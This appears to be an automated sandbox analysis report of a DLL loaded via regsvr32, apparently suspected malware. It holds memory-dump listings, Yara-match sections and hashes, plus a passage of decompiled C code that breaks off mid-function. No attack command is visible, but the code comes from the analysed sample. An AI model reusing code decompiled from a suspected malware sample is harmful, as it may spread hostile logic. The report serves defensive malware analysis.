                                                                      0x180015fb1
                                                                      0x180015fb6
                                                                      0x180015fbb
                                                                      0x180015fbf
                                                                      0x180015fc3
                                                                      0x180015fc7
                                                                      0x180015fcb
                                                                      0x180015fd1
                                                                      0x180015fd5
                                                                      0x180015fda
                                                                      0x180015fde
                                                                      0x180015fe3
                                                                      0x180015fe7
                                                                      0x180015fec
                                                                      0x180015ff0
                                                                      0x180015ff5
                                                                      0x180015ff9
                                                                      0x180015ffe
                                                                      0x180016001
                                                                      0x180016005
                                                                      0x180016008
                                                                      0x18001600b
                                                                      0x18001600e
                                                                      0x180016012
                                                                      0x180016017
                                                                      0x180016020
                                                                      0x180016029
                                                                      0x18001602b
                                                                      0x180016033
                                                                      0x18001603b
                                                                      0x180016045
                                                                      0x18001604d
                                                                      0x180016052
                                                                      0x18001605c
                                                                      0x18001605f
                                                                      0x180016072
                                                                      0x180016074
                                                                      0x180016083
                                                                      0x180016089
                                                                      0x18001608b
                                                                      0x18001608e
                                                                      0x180016090
                                                                      0x180016093
                                                                      0x180016095
                                                                      0x180016098
                                                                      0x1800160a6
                                                                      0x1800160b0
                                                                      0x1800160b3
                                                                      0x1800160b7
                                                                      0x1800160bd
                                                                      0x1800160c1
                                                                      0x1800160c8
                                                                      0x1800160ca
                                                                      0x1800160d9
                                                                      0x1800160df
                                                                      0x1800160e1
                                                                      0x1800160e4
                                                                      0x1800160e6
                                                                      0x1800160e9
                                                                      0x1800160eb
                                                                      0x1800160ee
                                                                      0x1800160fc
                                                                      0x180016106
                                                                      0x180016109
                                                                      0x18001610d
                                                                      0x180016112
                                                                      0x180016116
                                                                      0x18001611b
                                                                      0x18001612b
                                                                      0x18001612d
                                                                      0x180016132
                                                                      0x180016136
                                                                      0x180016139
                                                                      0x180016140
                                                                      0x180016144
                                                                      0x18001614f
                                                                      0x180016154
                                                                      0x180016159
                                                                      0x18001615e
                                                                      0x180016162
                                                                      0x180016166
                                                                      0x180016171
                                                                      0x180016176
                                                                      0x180016179
                                                                      0x18001617c
                                                                      0x180016185
                                                                      0x18001618c
                                                                      0x1800161a7

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: $*
                                                                      • API String ID: 0-3982473090
                                                                      • Opcode ID: 4c4de5cfb6812ea25d8b51b39267dac7b3610ed7c126a7db9d2c0714c1413672
                                                                      • Instruction ID: 98bf991814cc218a163944b9e4ff54ae661b2dcb0e70f334f948fc7dec415f89
                                                                      • Opcode Fuzzy Hash: 4c4de5cfb6812ea25d8b51b39267dac7b3610ed7c126a7db9d2c0714c1413672
                                                                      • Instruction Fuzzy Hash: F2C18672504B88C6EBE7CF2584543AD3BA1F34DB89F289529EB894B3A5CF31C649C705
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452456296.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02841000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_2841000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: I-$hHc
                                                                      • API String ID: 0-3234485265
                                                                      • Opcode ID: ba000ff28a27258ecf608962685c2fc93b60ac9711753bd3c8467a2dcebf1eb0
                                                                      • Instruction ID: 8d6254a69187675e77d816be5736415bc09dc81da6d4ba1d2e9a090279af6560
                                                                      • Opcode Fuzzy Hash: ba000ff28a27258ecf608962685c2fc93b60ac9711753bd3c8467a2dcebf1eb0
                                                                      • Instruction Fuzzy Hash: B3D1FFB560230DCBCBA8DF28C58A5DE7BE0FF54318F501129FC1A96262D774D869CB89
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452456296.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02841000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_2841000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: My$j+o
                                                                      • API String ID: 0-267290951
                                                                      • Opcode ID: f65e184fa4210501600fede75312cebe12ce4f320b08b98451a88c182f406ac0
                                                                      • Instruction ID: 81fe40209e7ed9c913a13cd7cdf12b46d3c5a56d66eede2dbdc513966f7b3d25
                                                                      • Opcode Fuzzy Hash: f65e184fa4210501600fede75312cebe12ce4f320b08b98451a88c182f406ac0
                                                                      • Instruction Fuzzy Hash: C6E157B590234DDFCB98CF68D68A58D7BF1BF59308F404129FC0A9A264D7B4D928CB49
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452456296.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02841000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_2841000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: +F}$mlA
                                                                      • API String ID: 0-1244340313
                                                                      • Opcode ID: cc6b147282dbac5eeed6622d565446b07558a23c53a084ac1f62e5779185930d
                                                                      • Instruction ID: f355fe150addd08f6ec7cb4b01d1f5a1479d4c9ed546a4240215cb0b3b089e4e
                                                                      • Opcode Fuzzy Hash: cc6b147282dbac5eeed6622d565446b07558a23c53a084ac1f62e5779185930d
                                                                      • Instruction Fuzzy Hash: 85C10075A15748DBCF58DF28C58A59E7BFAFF88308F108129EC0E8A260D774E915CB46
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452456296.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02841000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_2841000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 2J}\$p
                                                                      • API String ID: 0-3073210594
                                                                      • Opcode ID: 87bcd5c1c16be78f01caaea34988a9e214576219981f598b0f886c66be9abbb9
                                                                      • Instruction ID: 9d2598001d7d9c9e1e8b7c9621fa36607cdacc93eb66364a90bd7b3561d384df
                                                                      • Opcode Fuzzy Hash: 87bcd5c1c16be78f01caaea34988a9e214576219981f598b0f886c66be9abbb9
                                                                      • Instruction Fuzzy Hash: 31918A39518794DBC7A8DF28C48995EBBF0FB95308F802A1DF88AC7220D774D985CB42
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452456296.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02841000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_2841000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: X$Oc
                                                                      • API String ID: 0-2418163495
                                                                      • Opcode ID: fa88d72bdf115ffd93c451d4ab0f3f4673f1adfa55cf6393961ab52f056cd2b5
                                                                      • Instruction ID: b7d24e5bfbdb0385fdbf2e61085b15960ae9b1996c7b774a45da57b99ac0976e
                                                                      • Opcode Fuzzy Hash: fa88d72bdf115ffd93c451d4ab0f3f4673f1adfa55cf6393961ab52f056cd2b5
                                                                      • Instruction Fuzzy Hash: 26A1F5B45047498FCB48DF28C89A5DE3FA1FB28398F521219FC4AE6260D778D594CBC9
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452456296.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02841000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_2841000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: jB2]$4E
                                                                      • API String ID: 0-1400072560
                                                                      • Opcode ID: db2bf2eb7311e703373ea4a1abba9cccec4398f2bdfc90c31b6365624df40b45
                                                                      • Instruction ID: 3869a50c5976e81b6f1f189e1a1b8e9965312b28250a05519561336dd1aef159
                                                                      • Opcode Fuzzy Hash: db2bf2eb7311e703373ea4a1abba9cccec4398f2bdfc90c31b6365624df40b45
                                                                      • Instruction Fuzzy Hash: 34913775E04B4C9FCF68DFA8D08A99EBBF2FB44348F00051DD446A7250D7B8981ACB89
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452456296.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02841000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_2841000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: #YX"$t}h
                                                                      • API String ID: 0-1511716466
                                                                      • Opcode ID: 67b15c90a59285bd3cf247b2498ac974ec49b79bedc52f6003c7f73ecb320274
                                                                      • Instruction ID: eceb764379a7c624d9232bc97f5b3fdbaffa5c1474c16289b528cf0ea8116e04
                                                                      • Opcode Fuzzy Hash: 67b15c90a59285bd3cf247b2498ac974ec49b79bedc52f6003c7f73ecb320274
                                                                      • Instruction Fuzzy Hash: F1A1D9746083889FDBBADF24C8896DE7BF8FB45708F50061DE9C98A254D7B49744CB42
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452456296.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02841000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_2841000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: w\$~r^
                                                                      • API String ID: 0-894400261
                                                                      • Opcode ID: 4d09c71918172bc1b3c19b7aa1f21994dc61db7741f284eaca538d822f046124
                                                                      • Instruction ID: 020f0f9232478fdde5a998efe6bd6e59953305be98262c0bfd075f7fa6ddb1c3
                                                                      • Opcode Fuzzy Hash: 4d09c71918172bc1b3c19b7aa1f21994dc61db7741f284eaca538d822f046124
                                                                      • Instruction Fuzzy Hash: 6771FA7460478C9FCBBCCE28D8897EE7BA1FB46704F50811DE88E8E255DB745689CB02
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452456296.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02841000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_2841000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 8M&$x
                                                                      • API String ID: 0-3412828750
                                                                      • Opcode ID: 06ec56126f6208376e0b662db0dbed98609ca8854bf0e0ee9680b5ee48e3219f
                                                                      • Instruction ID: 064c66f0bc6f2461753614c9cc936cc610a468d0f164558cde414b29bca3c652
                                                                      • Opcode Fuzzy Hash: 06ec56126f6208376e0b662db0dbed98609ca8854bf0e0ee9680b5ee48e3219f
                                                                      • Instruction Fuzzy Hash: 4081E4749043988FDB7ADFA5C8896DDBBB0FB48748F10421EDC5AAB250DBB45684CF00
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452456296.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02841000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_2841000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: '#$]M
                                                                      • API String ID: 0-1662311358
                                                                      • Opcode ID: bc9f4fc074c5470de649b332c4df9642f621f111d308533d101e3b3f9b6533a1
                                                                      • Instruction ID: b4adb403ea2b1811d3e4c703666b9ed995ea77edc2e21cd1a6815dfeb41b4728
                                                                      • Opcode Fuzzy Hash: bc9f4fc074c5470de649b332c4df9642f621f111d308533d101e3b3f9b6533a1
                                                                      • Instruction Fuzzy Hash: E851087890425D8BCF48DF98D48A5AEBBB1FB48304F10411EE919F7350DB789A85CF96
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452456296.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02841000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_2841000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: p8,$_y
                                                                      • API String ID: 0-3796590841
                                                                      • Opcode ID: 8c1c441001e359d86e1bb87d889fca97a5c65e1eed8c86dac327db3822734389
                                                                      • Instruction ID: 29e42c02624fb2c856afe50c5bd27185bf76f334e7951d06c7f2c3ac309fa590
                                                                      • Opcode Fuzzy Hash: 8c1c441001e359d86e1bb87d889fca97a5c65e1eed8c86dac327db3822734389
                                                                      • Instruction Fuzzy Hash: 8451297451068C9BCF48CF28C8994DD3BB1FB483ACB565219FC4AE6250C778D488CB89
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452456296.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02841000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_2841000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: HU>$j_
                                                                      • API String ID: 0-3459992575
                                                                      • Opcode ID: 770da47320d8534ed7417c1a29f4930d6685e8ae3e2758346518d74a28c4b89c
                                                                      • Instruction ID: b0b4d561f135543fc92c009951bb21f0effecd826823ad1cfe4e5c1ee6f9e768
                                                                      • Opcode Fuzzy Hash: 770da47320d8534ed7417c1a29f4930d6685e8ae3e2758346518d74a28c4b89c
                                                                      • Instruction Fuzzy Hash: C05191B490078E8FCF48CF68C88A5DE7FB0FB58358F104A19E866A6250D3B4D665CF95
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452456296.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02841000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_2841000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Qez$Y~
                                                                      • API String ID: 0-3945493211
                                                                      • Opcode ID: ab85bcfbaa06cabbcf2cad91e9ff44c8b4e8295817edf3b5d429b2dbd2d00ce9
                                                                      • Instruction ID: 71744c279ebb7f482a398408cafa527a859c336432f0c1ef69a45d867ccce779
                                                                      • Opcode Fuzzy Hash: ab85bcfbaa06cabbcf2cad91e9ff44c8b4e8295817edf3b5d429b2dbd2d00ce9
                                                                      • Instruction Fuzzy Hash: 7141C5B590038E8FCB48DF64D88A0DF7FB0FB18358F014A19E869A2264D3B49665CF95
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452456296.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02841000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_2841000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: &=9$_KW
                                                                      • API String ID: 0-802514695
                                                                      • Opcode ID: 928e75ec2ef10eb30d1bd87bbe00313aa104253dd968fcf959546643c9e3d647
                                                                      • Instruction ID: f40a525ef09125ee6b28b40c668541aaa2b7d087dd500c8ac180c7f9fe822780
                                                                      • Opcode Fuzzy Hash: 928e75ec2ef10eb30d1bd87bbe00313aa104253dd968fcf959546643c9e3d647
                                                                      • Instruction Fuzzy Hash: AC41E5B080474E8BCF48CF64D48A4DEBFB0FB68398F104619E85AA6250D3B4D6A5CFC5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452456296.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02841000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_2841000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 9~x$:j@
                                                                      • API String ID: 0-704213647
                                                                      • Opcode ID: 34f653a25a1d0379ceafcddbd4abc4d9b6413e9163833d1ccaff680ed4d23394
                                                                      • Instruction ID: 9c9426876d78af1f951cb48541ed2ff2d713454bacc809608f50b9707f94dfc7
                                                                      • Opcode Fuzzy Hash: 34f653a25a1d0379ceafcddbd4abc4d9b6413e9163833d1ccaff680ed4d23394
                                                                      • Instruction Fuzzy Hash: C231E5B491035D8BDF44CF64C88A5DE7FF0FB68358F114219E849A6250D3B89A95CFC5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452456296.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02841000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_2841000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: f,T$gOk
                                                                      • API String ID: 0-1939537783
                                                                      • Opcode ID: 56514c86a3c815f99a7046bbaa0f27bb28cd234145ea6efc042b03f77617cd3b
                                                                      • Instruction ID: f72ac07ee89c9164134511b96b4a680274a73a1a07d060274b3b0eb36dab50c2
                                                                      • Opcode Fuzzy Hash: 56514c86a3c815f99a7046bbaa0f27bb28cd234145ea6efc042b03f77617cd3b
                                                                      • Instruction Fuzzy Hash: 6C4191B580038E8FCB44CF64C88A5DE7BB0FF18748F110A19E865A6250D3B4D665CF95
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452456296.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02841000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_2841000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Gd{$lE
                                                                      • API String ID: 0-2269258097
                                                                      • Opcode ID: d5f77f4370936a51137a8c10d136846e89ee7367d1966a9ba8583f681a500142
                                                                      • Instruction ID: 8d2ee1abe30bfcf257aa2fb73240d5d98a4be2e33069ffa926682cb582541c56
                                                                      • Opcode Fuzzy Hash: d5f77f4370936a51137a8c10d136846e89ee7367d1966a9ba8583f681a500142
                                                                      • Instruction Fuzzy Hash: 0941C3B590074E8FCB48DFA8C88A4CE7FB0FB18398F214219E859A6210D3749695CFC5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452456296.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02841000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_2841000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: (2Z$z
                                                                      • API String ID: 0-3757452713
                                                                      • Opcode ID: c0f13db1525d22eb2f21b5bca48ff17a0e67875f06422550c686fe25f5596b41
                                                                      • Instruction ID: 31794abe286234cc45ff5f30e51c0fb0fa36c5196b5c9984da0fc3ba8f68261c
                                                                      • Opcode Fuzzy Hash: c0f13db1525d22eb2f21b5bca48ff17a0e67875f06422550c686fe25f5596b41
                                                                      • Instruction Fuzzy Hash: 7431D6B190078E8FCF48DF68C8494DE7BF0FB58358F004629E869A6210D3B8D665CF95
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452456296.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02841000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_2841000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 'mz$aj
                                                                      • API String ID: 0-1824536522
                                                                      • Opcode ID: aa9e67c968fc08cff52e26736dec438d45593072d1ceb978eec300e0950af3fa
                                                                      • Instruction ID: a2cc9d261722a9be1e6432a0220378aad62f72e07968502fc7869e6e3f393c5d
                                                                      • Opcode Fuzzy Hash: aa9e67c968fc08cff52e26736dec438d45593072d1ceb978eec300e0950af3fa
                                                                      • Instruction Fuzzy Hash: 9831B0B190438E9FCB48DF64C88A49E7FB0FF54358F114A19E86AA6210D3B4DA64CFC5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 16%
                                                                      			E00000001180044E04(void* __eax) {
                                                                      
                                                                      				goto 0x80044e44;
                                                                      				asm("int3");
                                                                      				asm("int3");
                                                                      				asm("int3");
                                                                      				goto 0x8004519c;
                                                                      				asm("int3");
                                                                      				asm("int3");
                                                                      				asm("int3");
                                                                      				return __eax;
                                                                      			}



                                                                      0x180044e04
                                                                      0x180044e09
                                                                      0x180044e0a
                                                                      0x180044e0b
                                                                      0x180044e0c
                                                                      0x180044e11
                                                                      0x180044e12
                                                                      0x180044e13
                                                                      0x180044e1b

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CurrentFeaturePresentProcessProcessor
                                                                      • String ID:
                                                                      • API String ID: 1010374628-0
                                                                      • Opcode ID: 093e2d299ef59f4a37a571b4c899d1f63e349b4f84ed47adef65533377a5a151
                                                                      • Instruction ID: fbd2ea5610e5daaf1792d75d61b5ffd0f653eea336bb0e7434423fe266d3f5cb
                                                                      • Opcode Fuzzy Hash: 093e2d299ef59f4a37a571b4c899d1f63e349b4f84ed47adef65533377a5a151
                                                                      • Instruction Fuzzy Hash: 67020772315A4D41FAE79B1198863EA2780A74EBD9F06C625BDA94B3D2DE39C70D8304
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 33%
                                                                      			E0000000118004CFEC(signed long long __rbx, long long* __rcx, void* __rdx, long long __rsi, void* __r10) {
                                                                      				void* __rdi;
                                                                      				signed int _t134;
                                                                      				signed int _t156;
                                                                      				signed int _t188;
                                                                      				signed int _t194;
                                                                      				void* _t199;
                                                                      				signed long long _t237;
                                                                      				signed long long _t238;
                                                                      				signed int _t239;
                                                                      				long long _t240;
                                                                      				signed long long _t241;
                                                                      				long long _t243;
                                                                      				long long _t252;
                                                                      				signed char* _t260;
                                                                      				long long _t264;
                                                                      				void* _t266;
                                                                      				signed long long _t279;
                                                                      				void* _t282;
                                                                      				signed char* _t289;
                                                                      				long long* _t292;
                                                                      				long long _t294;
                                                                      				long long _t296;
                                                                      				signed long long _t297;
                                                                      				void* _t299;
                                                                      				signed long long _t300;
                                                                      				char* _t304;
                                                                      				void* _t313;
                                                                      				signed long long _t316;
                                                                      				signed long long _t319;
                                                                      				void* _t320;
                                                                      				signed long long _t323;
                                                                      				int _t325;
                                                                      				intOrPtr* _t326;
                                                                      
                                                                      				_t310 = __r10;
                                                                      				_t294 = __rsi;
                                                                      				_t282 = __rdx;
                                                                      				_t252 = __rbx;
                                                                      				_t313 = _t299;
                                                                      				 *((long long*)(_t313 + 0x10)) = __rbx;
                                                                      				 *((long long*)(_t313 + 0x18)) = _t296;
                                                                      				 *((long long*)(_t313 + 0x20)) = __rsi;
                                                                      				_t300 = _t299 - 0xa0;
                                                                      				_t237 =  *0x80072078; // 0xc949cbcab002
                                                                      				_t238 = _t237 ^ _t300;
                                                                      				 *(_t300 + 0x98) = _t238;
                                                                      				_t302 =  *((intOrPtr*)(__rcx + 0x138));
                                                                      				 *((long long*)(_t313 - 0x58)) = __rcx;
                                                                      				_t292 = __rcx;
                                                                      				 *((long long*)(_t313 - 0x50)) = __rbx;
                                                                      				r13d = 0;
                                                                      				r14d = 0;
                                                                      				r12d = 0;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x138)) == 0) goto 0x8004d5cf;
                                                                      				_t326 = __rcx + 0xc;
                                                                      				 *(_t300 + 0x58) = __rbx;
                                                                      				_t10 = _t252 + 1; // 0x1
                                                                      				_t199 = _t10;
                                                                      				if ( *_t326 != 0) goto 0x8004d074;
                                                                      				 *((long long*)(_t300 + 0x20)) = _t326;
                                                                      				r9d = 0x1004;
                                                                      				if (E00000001180059A0C(0, _t313 - 0x58,  *((intOrPtr*)(__rcx + 0x138)), __r10) != 0) goto 0x8004d59f;
                                                                      				_t256 = __rsi;
                                                                      				E0000000118003C1F4(_t120, __rsi, _t282, __r10);
                                                                      				 *(_t300 + 0x58) = _t238;
                                                                      				E0000000118003C1F4(E0000000118003A674(_t238, __rsi), __rsi, _t282, __r10);
                                                                      				_t319 = _t238;
                                                                      				E0000000118003C1F4(E0000000118003A674(_t238, __rsi), _t256, __rsi, __r10);
                                                                      				_t323 = _t238;
                                                                      				E0000000118003C1F4(E0000000118003A674(_t238, _t256), _t256, __rsi, _t310);
                                                                      				_t297 = _t238;
                                                                      				E0000000118003C1F4(E0000000118003A674(_t238, _t256), _t256, __rsi, _t310);
                                                                      				_t316 = _t238;
                                                                      				E0000000118003A674(_t238, _t256);
                                                                      				if ( *(_t300 + 0x58) == __rbx) goto 0x8004d59f;
                                                                      				if (_t319 == 0) goto 0x8004d59f;
                                                                      				if (_t316 == 0) goto 0x8004d59f;
                                                                      				if (_t323 == 0) goto 0x8004d59f;
                                                                      				if (_t297 == 0) goto 0x8004d59f;
                                                                      				 *_t316 = 0;
                                                                      				if (0 + _t199 - 0x100 < 0) goto 0x8004d11b;
                                                                      				if (GetCPInfo(_t325) == 0) goto 0x8004d59f;
                                                                      				if ( *(_t300 + 0x80) - 5 > 0) goto 0x8004d59f;
                                                                      				_t134 =  *(_t300 + 0x80) & 0x0000ffff;
                                                                      				 *(_t300 + 0x50) = _t134;
                                                                      				if (_t134 - _t199 <= 0) goto 0x8004d1bb;
                                                                      				if ( *_t326 != 0xfde9) goto 0x8004d180;
                                                                      				_t19 = _t316 + 0x80; // 0x80
                                                                      				r8d = 0x80;
                                                                      				E000000011800051C0(_t134, 0x20, _t19, _t300 + 0x80, _t302);
                                                                      				goto 0x8004d1bb;
                                                                      				_t260 = _t300 + 0x86;
                                                                      				if ( *((intOrPtr*)(_t300 + 0x86)) == 0) goto 0x8004d1bb;
                                                                      				if (_t260[1] == 0) goto 0x8004d1bb;
                                                                      				_t194 =  *_t260 & 0x000000ff;
                                                                      				if (_t194 - (_t260[1] & 0x000000ff) > 0) goto 0x8004d1b3;
                                                                      				_t239 = _t194;
                                                                      				 *((char*)(_t239 + _t316)) = 0x20;
                                                                      				if (_t194 + _t199 - (_t260[1] & 0x000000ff) <= 0) goto 0x8004d1a1;
                                                                      				if (_t260[2] != 0) goto 0x8004d191;
                                                                      				_t26 = _t323 + 0x81; // 0x81
                                                                      				_t28 = _t316 + 1; // 0x1
                                                                      				 *((intOrPtr*)(_t300 + 0x40)) = 0;
                                                                      				 *((intOrPtr*)(_t300 + 0x38)) =  *_t326;
                                                                      				 *((intOrPtr*)(_t300 + 0x30)) = 0xff;
                                                                      				 *((long long*)(_t300 + 0x28)) = _t26;
